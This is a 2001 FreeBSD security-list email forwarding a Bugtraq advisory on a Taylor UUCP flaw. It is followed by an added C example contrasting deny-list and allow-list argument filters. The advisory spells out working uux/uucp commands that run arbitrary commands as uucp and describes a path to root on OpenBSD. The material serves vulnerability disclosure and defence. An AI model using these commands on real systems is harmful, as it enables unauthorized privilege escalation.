Date: Sat, 08 Sep 2001 15:34:48 -0400
From: Mike Tancsa <mike@sentex.net>
To: security@freebsd.org
Subject: Fwd: Multiple vendor 'Taylor UUCP' problems.
Message-ID: <5.1.0.14.0.20010908153417.0286b4b8@192.168.0.12>
I imagine FreeBSD is vulnerable to this as well :-(
---Mike
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Sat, 8 Sep 2001 22:58:39 +1200 (NZST)
>From: zen-parse <zen-parse@gmx.net>
>X-X-Sender: <zen-parse@clarity.local>
>To: <bugtraq@securityfocus.com>
>Subject: Multiple vendor 'Taylor UUCP' problems.
>
>******************* Brief description *************
>
> Due to incorrect argument handling in a component of the
> Taylor UUCP package, it is possible for local users to
> gain uid/gid uucp.
>
> This may allow further elevation, depending on the system,
> up to and including root access.
>
> On OpenBSD 2.8 (and probably others) it allows root compromise.
> By overwriting the uucp owned program /usr/bin/uustat, arbitrary
> commands may be executed as part of the /etc/daily crontab script.
>
> On Redhat 7.0 (and probably others) it allows creation of empty
> files as root, and the ability to execute commands as if logged
> in at the console (as checked via /lib/security/pam_console.so).
> This may also allow further elevation of privileges, or denial of
> service. (Tested against uucp-1.06.1-25)
>
> Other systems running this package are also affected to
> a greater or lesser degree.
>
>*********************** Solution ******************
>
>Patches should be available very soon, if not already, for most
>affected systems.
>
>If you do not require uucp functionality, you should remove the
>uucp packages from your system.
>
>********************** The Programs ***************
>
>uux (1) - Remote command execution over UUCP
> If you specify an alternative configuration, it will run as the user
> that called it, and pass the same configuration to uuxqt.
>
>uuxqt (1) - UUCP execution daemon
> Defaults to allowing rmail and uucp to be run, and nothing else,
> unless the configuration it is invoked with allows it to run other
> commands.
>
>uucp (1) - Unix to Unix copy
> If you specify an alternate configuration, it will also run as the user
> that called it.
>
> uuxqt checks the arguments for the programs it is asked to execute
> and gets rid of what it thinks are the potentially dangerous ones.
> However, it does not remove long arguments.
>
>******************** The Exploit ******************
>
>uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'
>
>will execute uucp, but will not use the /tmp/vv.v configuration file.
>
>However,
>
>uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'
>
>will use the supplied configuration, without dropping privileges.
>
>1) Make a configuration file that allows any command to be executed, and
> allows files from anywhere to be copied to anywhere that is writable
> by uid/gid uucp. ( /tmp/config.uucp )
>2) Make a command file with the command you want to be executed.
> ( /tmp/commands.uucp )
>3) Do something like the following:
>
>$ THISHOST=`uuname -l`
>$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
>$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}
>
>The commands in /tmp/commands.uucp file will be executed by uuxqt, with
>the uid/gid of uucp.
>
>If you want to perform an exploit, and don't know what to put in the
>files, you should read the documentation for uucp.
>
>(Proof of concept root exploit for OpenBSD was performed on the wargame
>running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )
>
>-- zen-parse
>
>===========================================================================
> http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
> 'gone platinum' = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
> = and %73%6f%75%6e%64%73%20%6f%6b
>===========================================================================
>
>-------------------------------------------------------------------------
>The preceding information is confidential and may not be redistributed
>without explicit permission. Legal action may be taken to enforce this.
>If this message was posted by zen-parse@gmx.net to a public forum it may
>be redistributed as long as these conditions remain attached. If you are
>mum or dad, this probably doesn't apply to you.
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
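The root cause described in the forwarded advisory is an argument filter that strips the short "-I" configuration option but lets the long "--config=" form through. As an added illustration (not Taylor UUCP's code, and not part of either message above), the following compares a deny-list filter modelled on that behaviour with an allow-list filter that rejects every option not explicitly permitted; the option names in the allow-list are constructed for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Illustrative argument filters (hypothetical, not Taylor UUCP's own code). */

/* Deny-list filter, modelled on the behaviour the advisory describes:
 * it recognises only the short "-I<file>" configuration option, so the
 * equivalent "--config=<file>" long form passes straight through. */
bool denylist_rejects(const char *arg)
{
    return strncmp(arg, "-I", 2) == 0;
}

/* Allow-list filter: anything that looks like an option is rejected unless
 * it is in a short list of known-harmless ones.  This covers the long
 * form, the split "--config <file>" form and getopt_long-style
 * abbreviations such as "--conf=<file>" without enumerating them. */
static const char *const allowed_options[] = { "-r", NULL }; /* constructed */

bool allowlist_rejects(const char *arg)
{
    if (arg[0] != '-' || arg[1] == '\0')   /* plain argument, or lone "-" */
        return false;
    for (const char *const *p = allowed_options; *p != NULL; p++)
        if (strcmp(arg, *p) == 0)
            return false;
    return true;
}

/* Apply a filter to an argv-style vector in place, compacting survivors.
 * Returns the number of arguments kept. */
int filter_args(bool (*rejects)(const char *), const char **argv, int argc)
{
    int kept = 0;
    for (int i = 0; i < argc; i++)
        if (!rejects(argv[i]))
            argv[kept++] = argv[i];
    return kept;
}

int main(void)
{
    /* Constructed samples: the two command forms quoted in the advisory. */
    const char *a[] = { "uucp", "-I/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile" };
    const char *b[] = { "uucp", "--config=/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile" };
    printf("deny-list, short form: keeps %d of 4\n", filter_args(denylist_rejects, a, 4));
    printf("deny-list, long form:  keeps %d of 4\n", filter_args(denylist_rejects, b, 4));
    printf("allow-list, long form: keeps %d of 4\n", filter_args(allowlist_rejects, b, 4));
    return 0;
}
```

The deny-list keeps all four arguments of the long form, which is exactly the gap the advisory describes; the allow-list drops the option and keeps three.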